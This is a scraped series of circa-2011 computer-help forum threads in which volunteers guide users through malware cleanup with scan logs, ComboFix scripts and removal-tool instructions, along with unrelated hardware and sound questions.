Adobe Flash Player 10.1.102.64
Mozilla Thunderbird (3.1.10) Thunderbird Out of Date!
````````````````````````````````
Process Check:
objlist.exe by Laurent
Malwarebytes' Anti-Malware mbamservice.exe
Malwarebytes' Anti-Malware mbamgui.exe
AVAST Software Avast AvastSvc.exe
AVAST Software Avast avastUI.exe
``````````End of Log````````````
SysProt AntiRootkit v1.0.1.0
by swatkat

******************************************************************************************
******************************************************************************************

No Hidden Processes found

******************************************************************************************
******************************************************************************************
Kernel Modules:
Module Name: \SystemRoot\System32\Drivers\dump_atapi.sys
Service Name: ---
Module Base: A8507000
Module End: A851F000
Hidden: Yes

Module Name: \SystemRoot\System32\Drivers\dump_WMILIB.SYS
Service Name: ---
Module Base: BA644000
Module End: BA646000
Hidden: Yes

******************************************************************************************
******************************************************************************************
SSDT:
Function Name: ZwAddBootEntry
Address: A8622202
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwAllocateVirtualMemory
Address: A8688CB2
Driver Base: A867F000
Driver End: A86C9000
Driver Name: \SystemRoot\System32\Drivers\aswSP.SYS

Function Name: ZwClose
Address: A86466C1
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwCreateEvent
Address: A862481C
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwCreateEventPair
Address: A8624874
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwCreateIoCompletion
Address: A862498A
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwCreateKey
Address: A8646075
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwCreateMutant
Address: A8624772
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwCreateSection
Address: A86248C4
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwCreateSemaphore
Address: A86247C6
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwCreateTimer
Address: A8624938
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwDeleteBootEntry
Address: A8622226
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwDeleteKey
Address: A8646D87
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwDeleteValueKey
Address: A864703D
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwDuplicateObject
Address: A8624C0E
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwEnumerateKey
Address: A8646BF2
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwEnumerateValueKey
Address: A8646A5D
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwFreeVirtualMemory
Address: A8688D62
Driver Base: A867F000
Driver End: A86C9000
Driver Name: \SystemRoot\System32\Drivers\aswSP.SYS

Function Name: ZwLoadDriver
Address: A8621FF0
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwModifyBootEntry
Address: A862224A
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwNotifyChangeKey
Address: A8624D82
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwNotifyChangeMultipleKeys
Address: A8622CDA
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwOpenEvent
Address: A862484C
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwOpenEventPair
Address: A862489C
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwOpenIoCompletion
Address: A86249B4
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwOpenKey
Address: A86463D1
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwOpenMutant
Address: A862479E
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwOpenProcess
Address: A8624A46
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwOpenSection
Address: A8624904
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwOpenSemaphore
Address: A86247F4
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwOpenThread
Address: A8624B2A
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwOpenTimer
Address: A8624962
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwProtectVirtualMemory
Address: A8688DFA
Driver Base: A867F000
Driver End: A86C9000
Driver Name: \SystemRoot\System32\Drivers\aswSP.SYS

Function Name: ZwQueryKey
Address: A86468D8
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwQueryObject
Address: A8622BA0
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwQueryValueKey
Address: A864672A
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwRenameKey
Address: A8691E48
Driver Base: A867F000
Driver End: A86C9000
Driver Name: \SystemRoot\System32\Drivers\aswSP.SYS

Function Name: ZwRestoreKey
Address: A86456E8
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwSetBootEntryOrder
Address: A862226E
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwSetBootOptions
Address: A8622292
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwSetSystemInformation
Address: A862204A
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwSetSystemPowerState
Address: A8622186
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwSetValueKey
Address: A8646E8E
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwShutdownSystem
Address: A8622162
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwSystemDebugControl
Address: A86221AA
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

Function Name: ZwVdmControl
Address: A86222B6
Driver Base: A860F000
Driver End: A867F000
Driver Name: \SystemRoot\System32\Drivers\aswSnx.SYS

******************************************************************************************
******************************************************************************************
Kernel Hooks:
Hooked Function: ZwCreateProcessEx
At Address: 805C74CC
Jump To: A869E906
Module Name: C:\WINDOWS\System32\Drivers\aswSP.SYS

Hooked Function: ZwClose
At Address: 805B1DB4
Jump To: A869A2BE
Module Name: C:\WINDOWS\System32\Drivers\aswSP.SYS

Hooked Function: PsCreateSystemThread
At Address: 805C74CC
Jump To: A869E906
Module Name: C:\WINDOWS\System32\Drivers\aswSP.SYS

Hooked Function: ObMakeTemporaryObject
At Address: 805B1DB4
Jump To: A869A2BE
Module Name: C:\WINDOWS\System32\Drivers\aswSP.SYS

Hooked Function: ObInsertObject
At Address: 805B8C2C
Jump To: A869BD5C
Module Name: C:\WINDOWS\System32\Drivers\aswSP.SYS

Hooked Function: ObCloseHandle
At Address: 805B1DB4
Jump To: A869A2BE
Module Name: C:\WINDOWS\System32\Drivers\aswSP.SYS

******************************************************************************************
******************************************************************************************
Hidden files/folders:
Object: C:\Qoobox\BackEnv\AppData.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\Cache.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\Cookies.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\Desktop.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\Favorites.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\History.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\LocalAppData.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\LocalSettings.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\Music.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\NetHood.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\Personal.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\Pictures.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\PrintHood.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\Profiles.Folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\Profiles.Folder.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\Programs.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\Recent.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\SendTo.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\SetPath.bat
Status: Access denied

Object: C:\Qoobox\BackEnv\StartMenu.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\StartUp.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\SysPath.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\Templates.folder.dat
Status: Access denied

Object: C:\Qoobox\BackEnv\VikPev00
Status: Access denied

Update Your Java (JRE)

Old versions of Java have vulnerabilities that malware can use to infect your system.

First Verify your Java Version

If there are any other version(s) installed then update now.

Get the new version (if needed)

If your version is out of date install the newest version of the Sun Java Runtime Environment.

Note: UNCHECK any pre-checked toolbar and/or software offered with the Java update. The pre-checked toolbars/software are not part of the Java update.

Be sure to close ALL open web browsers before starting the installation.

Remove any old versions

1. Download JavaRa and unzip the file to your Desktop.
2. Open JavaRA.exe and choose Remove Older Versions
3. Once complete exit JavaRA.

Additional Note: The Java Quick Starter (JQS.exe) adds a service to improve the initial startup time of Java applets and applications. To disable the JQS service if you don't want to use it, go to Start > Control Panel > Java > Advanced > Miscellaneous and uncheck the box for Java Quick Starter. Click OK and reboot your computer.
*************************************************
Please download the newest version of Adobe Acrobat Reader from Adobe.com

Before installing: it is important to remove older versions of Acrobat Reader since it does not do so automatically and old versions still leave you vulnerable.
Go to the Control Panel and enter Add or Remove Programs.
Search in the list for all previous installed versions of Adobe Acrobat Reader. Uninstall/Remove each of them.

Once old versions are gone, please install the newest version.
****************************************************
I'd like to scan your machine with ESET OnlineScan

•Hold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScan
•Click the button.
•For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the icon on your desktop.
•Check
•Click the button.
•Accept any security warnings from your browser.
•Check
•Push the Start button.
•ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
•When the scan completes, push
•Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
•Push the button.
•Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt Sorry SD, GOT tied up.
All programs now up to date and ESET log is as follows.
[emailprotected] as CAB hook log:
OnlineScanner.ocx - registred OK
# version=7
# iexplore.exe=8.00.6001.18702 (longhorn_ie8_rtm(wmbla).090308-0339)
# OnlineScanner.ocx=1.0.0.6526
# api_version=3.0.2
# EOSSerial=7e0d20dfcc64494e9c93b2f68bdcb13f
# end=finished
# remove_checked=true
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2011-06-18 01:16:55
# local_time=2011-06-18 03:16:55 (+0100, W. Europe Daylight Time)
# country="United Kingdom"
# lang=1033
# osver=5.1.2600 NT Service Pack 3
# compatibility_mode=512 16777215 100 0 21872299 21872299 0 0
# compatibility_mode=2560 16777215 100 0 0 0 0 0
# compatibility_mode=8192 67108863 100 0 0 0 0 0
# scanned=39631
# found=0
# cleaned=0
# scan_time=1473That looks good. If there are no other issues, let's do some cleanup.

To uninstall ComboFix

  • Click the Start button. Click Run. For Vista: type in Run in the Start search, and click on Run in the results pane.
  • In the field, type in ComboFix /uninstall


(Note: Make sure there's a space between the word ComboFix and the forward-slash.)

  • Then, press Enter, or click OK.
  • This will uninstall ComboFix, delete its folders and files, hides System files and folders, and resets System Restore.
*********************************************
Clean out your temporary internet files and temp files.

Download TFC by OldTimer to your desktop.

Double-click TFC.exe to run it.

Note: If you are running on Vista, right-click on the file and choose Run As Administrator

TFC will close all programs when run, so make sure you have saved all your work before you begin.

* Click the Start button to begin the cleaning process.
* Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two.
* Please let TFC run uninterrupted until it is finished.

Once TFC is finished it should restart your computer. If it does not, please manually restart the computer yourself to ensure a complete cleaning.
***********************************************
Use the Secunia Software Inspector to check for out of date software.

•Click Start Now

•Check the box next to Enable thorough system inspection.

•Click Start

•Allow the scan to finish and scroll down to see if any updates are needed.
•Update anything listed.
.
----------

Go to Microsoft Windows Update and get all critical updates.

----------

I suggest using WOT - Web of Trust. WOT is a free Internet security addon for your browser. It will keep you safe from online scams, identity theft, spyware, spam, viruses and unreliable shopping sites. WOT warns you before you interact with a risky website. It's easy and it's free.

SpywareBlaster- Secure your Internet Explorer to make it harder for ActiveX programs to run on your computer. Also stop certain cookies from being added to your computer when running Mozilla based browsers like Firefox.
* Using SpywareBlaster to protect your computer from Spyware and Malware
* If you don't know what ActiveX controls are, see here

Protect yourself against spyware using the Immunize feature in Spybot - Search & Destroy. Guide: Use Spybot's Immunize Feature to prevent spyware infection in real-time. Note: To ensure you have the latest Immunizations always update Spybot - Search & Destroy before Immunizing. Spybot - Search & Destroy FAQ

Check out Keeping Yourself Safe On The Web for tips and free tools to help keep you safe in the future.

Also see Slow Computer? It may not be Malware for free cleaning/maintenance tools to help keep your computer running smoothly.
Safe Surfing!
Have now followed all instructions.
Thanks very much for all your help SD.
RegardsYou're welcome. I will lock this thread. If you need it reopened, please send me a pm.
Discussion
3261.

Solve : Computer reboots at win logo even safe mode?

Answer»

Now that you're able to boot in Normal Mode, why don't we run some scans and see if we can find out what's happening?
Once I see the logs I can give you some advice on how to protect your computer.

Please do this: Hold CTRL, ALT and Delete all at once to bring up the taskmanager. In the Process tab click twice on the Memory Usage. That will list the highest to the lowest processes. Do a screen print and post it in your next reply
How to post screenshots or images

SUPERAntiSpyware

If you ALREADY have SUPERAntiSpyware be sure to check for updates before SCANNING!

Download SuperAntispyware Free Edition (SAS)
* Double-click the icon on your desktop to run the installer.
* When asked to Update the program definitions, click Yes
* If you encounter any problems while downloading the updates, manually download and unzip them from here
* Next click the Preferences button.

•Under Start-Up Options uncheck Start SUPERAntiSpyware when Windows starts
* Click the Scanning Control tab.
* Under Scanner Options make sure only the following are checked:

•Close browsers before scanning
•Scan for tracking cookies
•Terminate memory threats before quarantining
Please LEAVE the others unchecked

•Click the Close button to leave the control center screen.

* On the main screen click Scan your computer
* On the left check the box for the drive you are scanning.
* On the right choose Perform Complete Scan
* Click Next to start the scan. Please be patient while it scans your computer.
* After the scan is complete a summary box will appear. Click OK
* Make sure everything in the white box has a check next to it, then click Next
* It will quarantine what it found and if it asks if you want to reboot, click Yes

•To retrieve the removal information please do the following:
•After reboot, double-click the SUPERAntiSpyware icon on your desktop.
•Click Preferences. Click the Statistics/Logs tab.

•Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.

•It will open in your default text editor (preferably Notepad).
SAVE the notepad file to your desktop by clicking (in notepad) File > Save As...

* Save the log somewhere you can easily find it. (normally the desktop)
* Click close and close again to exit the program.
*Copy and Paste the log in your post.
*********************************************
Download DDS from HERE or HERE and save it to your desktop.

Vista users right click on dds and select Run as administrator (you will receive a UAC prompt, please allow it)

* XP users Double click on dds to run it.
* If your antivirus or firewall try to block DDS then please allow it to run.
* When finished DDS will open two (2) logs.

1) DDS.txt
2) Attach.txt

* Save both logs to your desktop.
* Please copy and paste the entire contents of both logs in your next reply.

Note: DDS will instruct you to post the Attach.txt log as an attachment.
Please just post it as you would any other log by COPYING and pasting it into the reply.
thanks Dave i'll be back at my desktop computer tomorrow, so i'll follow your instructions and post results, thanks
Discussion
3262.

Solve : No sound on flash embedded videos?

Answer»

Hi guys running a windows VISTA laptop and the SOUND will not work on any flash videos. Baically i have updated all sound drivers, checked flash SETTINGS uninstalled flash, re installed but to no avail. Normal videos play OK just online videos dont, PLEASE help
Discussion
3263.

Solve : Am I just unlucky...?

Answer»

BACKGROUND - We had a home computer which picked up a bug of some sort, got it fixed through Hijack This but... subsequently found Trojan on a memory stick that had been used on that PC and laptops, this was also sorted.

ISSUES - I used the home PC (XP) and laptop (Vista) for managing my photos, after a short spell I could no longer read from my Pentax DSLR onto the laptop, stopped using the home PC and eventually got rid of it.

The Pentax broke, I bought a Canon - after a short while I could no longer read directly from the camera onto the laptop. The Canon was never attached to the home PC (now gone).

I have a new memory stick; I can read from it but everytime I plug it in to the laptop I get a message saying I should SCAN and fix errors, NONE are ever found.

I bought a Seagate external HARD drive and transfered all the useful stuff off my Vista laptop onto it, then attached it to my new 7 laptop - after a few days my laptop could no longer find the Seagate.

Have I been unlucky or is something odd whistling up my USBs every time I plug them in?

Thanks in advance for any advice.

I have an Seagate external hard drive for 3 YEAR's and have no problem's, but it's alway's off until i need or update file's to it.The message you get about scanning and fixing errors is normal - ignore it. As for the external drive, try it on another computer to make sure it's still good. If it is, open disk management on the computer in question and tell us if you see the drive there.
Discussion
3264.

Solve : Clicked on a tab I shouldn't have and then......?

Answer»

Ok. I will lock this thread. If you need it re-opened, please send me a pm.This is a pm from the OP.

I needed to uninstall avg free in order to use combofix uninstall. Combofix eventually uninstalled..

..I needed to reinstall avg and it wouldn't work (so I haven't completed your final instructions) I experienced a situation like we discussed earlier; downloads would stop downloading and not complete. I started avg and got about 7% before the download stopped. Like a download stops because it needs to add more to the buffer but there is nothing GETTING it started again. So it took about 15 times to RESTART the avg download before it finally completed.

Restarted (didnot run scan but updated av).

So I continued with final instructions and download TFC. Wouldnt work. A TFC pop up INSTANTLY occurs and asks yes to download. It doesn't go to a home page for me to select. The next instant popup SAYS; "TFC cannot be run from a temp folder. Plz d/l to your desk top or......."

Stay in this thread or start a new one in Windows issues.
If TFC won't work, please try diskcleanup. You can find it under All Programs, Accessories, System Tools, diskcleanup.
The other problem with downloads won't complete; I don't feel that this is not a problem caused by MALWARE. It probably has something to do with settings or with your Firewall.
Quote

Stay in this thread or start a new one in Windows issues.
It would be best to start a new one.Ok. I'll complete the rest of these tasks with that in mind. I will start a new thread in Windows the subject; "Downloads won't complete".

Once again thanks.

You're welcome. I will lock this thread.
Discussion
3265.

Solve : virus/malware/spyware programs running together?

Answer»

I currently am running Norton 360 premier for virus protection. I am ALSO running stopzilla for spyware protection and recently had a worm sending out emails from my contacts. I also now am running Malbytes for maleware protection and am thinking of buying their anti-malware pro.

In your guidelines section you state "You should only have one antivirus and one firewall active at any TIME. If you have two of either installed then only ONE should be running. Either uninstall one now before continuing or ADJUST the settings to where the real-time protection is not running. Having two running at the same time will just cause problems."

Are virus/spyware and malware programs different? and should I use all THREE or just one?

I have hp s3720f pc with windows vista. I will PROBABLY upgrade to windows 7 in a few months.


Quote

Are virus/spyware and malware programs different? and should I use all three or just one?
Anti-Virus programs are designed to protect against viruses only. Some have anti-malware built into the programs. You need other programs to protect against malware, spyware, rogues etc. You can have more than one of these running at any time. Sort of a layered approach to safety.MalWareBytes-Anti-malware is very good and they now have a free trial period of full-time protection. Many thanks.
Discussion
3266.

Solve : does avira personal free antivirus have spyware protection or not??

Answer»

latest free VERSION of avira,does it has antispyware like AVG and avast or not.You can CHECK it out here. but MSE here has. Microsoft Security Essentials provides real-time protection for your HOME or small business PC that guards against viruses, spyware, and other malicious software.
Discussion
3267.

Solve : Major attack and I don't know who to trust??

Answer»

Re-running ComboFix to remove infections:

  • Close any open browsers.
  • Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.
  • Open notepad and copy/paste the text in the quotebox below into it:
    Quote
    KillAll::
    DDS::
    Trusted Zone: microsoft.com\update
    Trusted Zone: sympatico.ca\www
    Trusted Zone: windowsupdate.com\download

    RenV::
    c:\program files\Adobe\Reader 10.0\Reader\Reader_sl .exe
    c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM .exe
    c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier .exe
    c:\program files\Common Files\InstallShield\UpdateService\issch .exe
    c:\program files\Common Files\Java\Java Update\jusched .exe
    c:\program files\D-Link\RangeBooster G WUA-2340\AirPlusCFG .exe
    c:\program files\Hewlett-Packard\HP Boot Optimizer\HPBootOp .exe
    c:\program files\HP\Digital Imaging\{33D6CC28-9F75-4d1b-A11D-98895B3A3729}\hphupd08 .exe
    c:\program files\HP\HP Software Update\HPWuSchd2 .exe
    c:\program files\HP DigitalMedia Archive\DMAScheduler .exe
    c:\program files\IObit\Advanced SystemCare 3\AWC .exe
    c:\program files\IObit\Advanced SystemCare 4\ASCTray .exe
    c:\program files\IObit\IObit Security 360\IS360tray .exe
    c:\program files\iTunes\iTunesHelper .exe
    c:\program files\Pando Networks\Media Booster\PMB .exe
    c:\program files\QuickTime\qttask .exe
    c:\windows\ehome\ehtray .exe
    c:\windows\SMINST\RECGUARD .exe

    Registry::
    [-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Tpara]
    c:\windows\dmqusv2.dll

  • Save this as CFScript.txt, in the same location as ComboFix.exe



  • Referring to the picture above, drag CFScript into ComboFix.exe
  • When finished, it shall produce a log for you at C:\ComboFix.txt
  • Please post the contents of the log in your next reply.
Hi SuperDave,

Tried this once and it didn't work. Error message PEV.exe has encountered a problem and must close. Also tried to turn the firwall off after reboot and it didn't work. Perhaps I wasn't fast enough as the screen seems locked on the Online Armour message. I'm back online to redownload the ComboFix and start from scratch one more time. Another error message came up. One of those 0X800***** ones but I just clicked OK as ComboFix was still on the screen. I'll try it again. Still no luck. Online Armor seems to be stopping the process. It made me "Allow" 3 files when I restarted it to go back online. Do I have to rename the file again? Is there a way to stop the firewalls from starting. When Online Armor is disabled, Windows Firewall starts up and I have to jump to the Control panel to stop that. I'll try one more time while I wait for your reply. It may work now that I have OKed the files in Online Armor.OK, third times a charm. Got a few error messages:

ONLINE_ARMOR_WTS: oasrv.exe - Application Error
Instruction at 0X00e5205c - memory could not read

oasrv.exe - Application Error
0X0040745e - 0X00e434a4

After the Combo Fix ran this time Online Armor is missing from the taskbar. It also wanted me to make a decision about module hidserv.dll and module %1 associated with regedit.exe. I blocked them both as I didn't KNOW what they were.

Here is the log:

ComboFix 11-05-26.01 - HP_Administrator 26/05/2011 20:16:09.4.2 - x86
Microsoft Windows XP Professional 5.1.2600.3.1252.2.1033.18.958.482 [GMT -4:00]
Running from: c:\documents and settings\HP_Administrator\Desktop\ComboFix.exe
Command switches used :: c:\documents and settings\HP_Administrator\Desktop\CFScript.txt
AV: Microsoft Security Essentials *Disabled/Updated* {BCF43643-A118-4432-AEDE-D861FCBCFCDF}
AV: Microsoft Security Essentials *Disabled/Updated* {EDB4FA23-53B8-4AFA-8C5D-99752CCA7095}
FW: Online Armor Firewall *Disabled* {B797DAA0-7E2E-4711-8BB3-D12744F1922A}
.
.
((((((((((((((((((((((((( Files Created from 2011-04-27 to 2011-05-27 )))))))))))))))))))))))))))))))
.
.
2011-05-27 00:01 . 2011-05-27 00:0128752----a-w-c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{9FB231EF-0036-4D0F-85EA-3DF4A8ED3BAC}\MpKsl83bc2927.sys
2011-05-27 00:01 . 2011-05-18 16:376962000----a-w-c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{9FB231EF-0036-4D0F-85EA-3DF4A8ED3BAC}\mpengine.dll
2011-05-26 23:41 . 2011-05-18 16:376962000----a-w-c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2011-05-23 22:37 . 2011-05-23 22:37388096----a-r-c:\documents and settings\HP_Administrator\Application Data\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2011-05-23 22:36 . 2011-05-23 22:40--------d-----w-c:\program files\Trend Micro
2011-05-23 22:23 . 2011-05-23 22:23--------d-----w-c:\program files\TrendMicro
2011-05-23 21:33 . 2011-05-23 21:33--------d-----w-c:\documents and settings\HP_Administrator\Application Data\Malwarebytes
2011-05-23 21:33 . 2010-12-20 22:0938224----a-w-c:\windows\system32\drivers\mbamswissarmy.sys
2011-05-23 21:33 . 2011-05-23 21:33--------d-----w-c:\documents and settings\All Users\Application Data\Malwarebytes
2011-05-23 21:33 . 2010-12-20 22:0820952----a-w-c:\windows\system32\drivers\mbam.sys
2011-05-23 21:33 . 2011-05-23 21:33--------d-----w-c:\program files\Malwarebytes' Anti-Malware
2011-05-23 17:55 . 2011-05-23 17:55--------d-----w-c:\documents and settings\HP_Administrator\Application Data\SUPERAntiSpyware.com
2011-05-23 17:55 . 2011-05-23 17:55--------d-----w-c:\documents and settings\All Users\Application Data\SUPERAntiSpyware.com
2011-05-23 17:54 . 2011-05-23 17:55--------d-----w-c:\program files\SUPERAntiSpyware
2011-05-23 17:35 . 2011-05-23 17:35--------d-----w-c:\program files\CCleaner
2011-05-23 16:44 . 2011-05-23 17:22--------d-----w-c:\documents and settings\All Users\Application Data\OnlineArmor
2011-05-23 16:44 . 2011-05-23 16:45--------d-----w-c:\documents and settings\HP_Administrator\Application Data\OnlineArmor
2011-05-23 16:43 . 2011-04-06 17:0239048----a-w-c:\windows\system32\drivers\oahlp32.sys
2011-05-23 16:43 . 2011-04-06 17:0125192----a-w-c:\windows\system32\drivers\OAmon.sys
2011-05-23 16:43 . 2011-04-06 17:0129464----a-w-c:\windows\system32\drivers\OAnet.sys
2011-05-23 16:43 . 2011-04-06 17:01205864----a-w-c:\windows\system32\drivers\OADriver.sys
2011-05-23 16:42 . 2011-05-27 00:03--------d-----w-c:\program files\Online Armor
2011-05-23 12:38 . 2011-05-23 12:38--------d-----w-C:\Softpaq
2011-05-23 07:07 . 2011-05-23 07:07664----a-w-c:\documents and settings\NetworkService\Local Settings\Application Data\d3d9caps.tmp
2011-05-22 22:56 . 2011-05-22 22:56--------d-----w-c:\documents and settings\All Users\Application Data\nView_Profiles
2011-05-22 16:25 . 2011-05-22 16:26--------d-----w-c:\program files\Microsoft Security Client
2011-05-21 13:19 . 2011-05-21 13:23--------d-----w-c:\documents and settings\HP_Administrator\Application Data\FixCleaner
2011-05-21 13:17 . 2011-05-21 13:28--------d-----w-c:\program files\FixCleaner
2011-05-21 11:08 . 2011-05-21 11:08--------d-----w-c:\documents and settings\HP_Administrator\Application Data\DriverCure
2011-05-21 11:08 . 2011-05-21 11:08--------d-----w-c:\documents and settings\HP_Administrator\Application Data\ParetoLogic
2011-05-21 11:08 . 2011-05-22 16:18--------d-----w-c:\documents and settings\All Users\Application Data\ParetoLogic
2011-05-20 23:38 . 2011-05-20 23:38--------d-----w-c:\documents and settings\HP_Administrator\Application Data\MSNInstaller
2011-05-08 13:29 . 2011-05-19 23:47--------d-----w-c:\documents and settings\HP_Administrator\Application Data\Nitro PDF
2011-05-08 13:28 . 2011-04-06 01:5517712----a-w-c:\windows\system32\nitrolocalui.dll
2011-05-08 13:28 . 2011-04-06 01:5526416----a-w-c:\windows\system32\nitrolocalmon.dll
2011-05-08 13:28 . 2011-05-08 13:28--------d-----w-c:\documents and settings\All Users\Application Data\Nitro PDF
2011-05-08 13:27 . 2011-05-08 13:27--------d-----w-c:\documents and settings\HP_Administrator\Application Data\Downloaded Installations
2011-05-08 13:15 . 2011-02-28 22:37180624----a-w-c:\windows\system32\Primomonnt.dll
2011-05-08 13:15 . 2011-05-20 23:34--------d-----w-c:\program files\Nitro PDF
2011-05-07 17:32 . 2011-05-07 17:32--------d-----w-c:\documents and settings\HP_Administrator\Local Settings\Application Data\Kobo
2011-05-07 17:31 . 2011-05-07 17:32--------d-----w-c:\program files\Kobo
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2011-05-21 11:20 . 2004-08-10 04:0014336----a-w-c:\windows\system32\svchost.exe
2011-04-14 09:07 . 2010-12-20 00:29472808----a-w-c:\windows\system32\deployJava1.dll
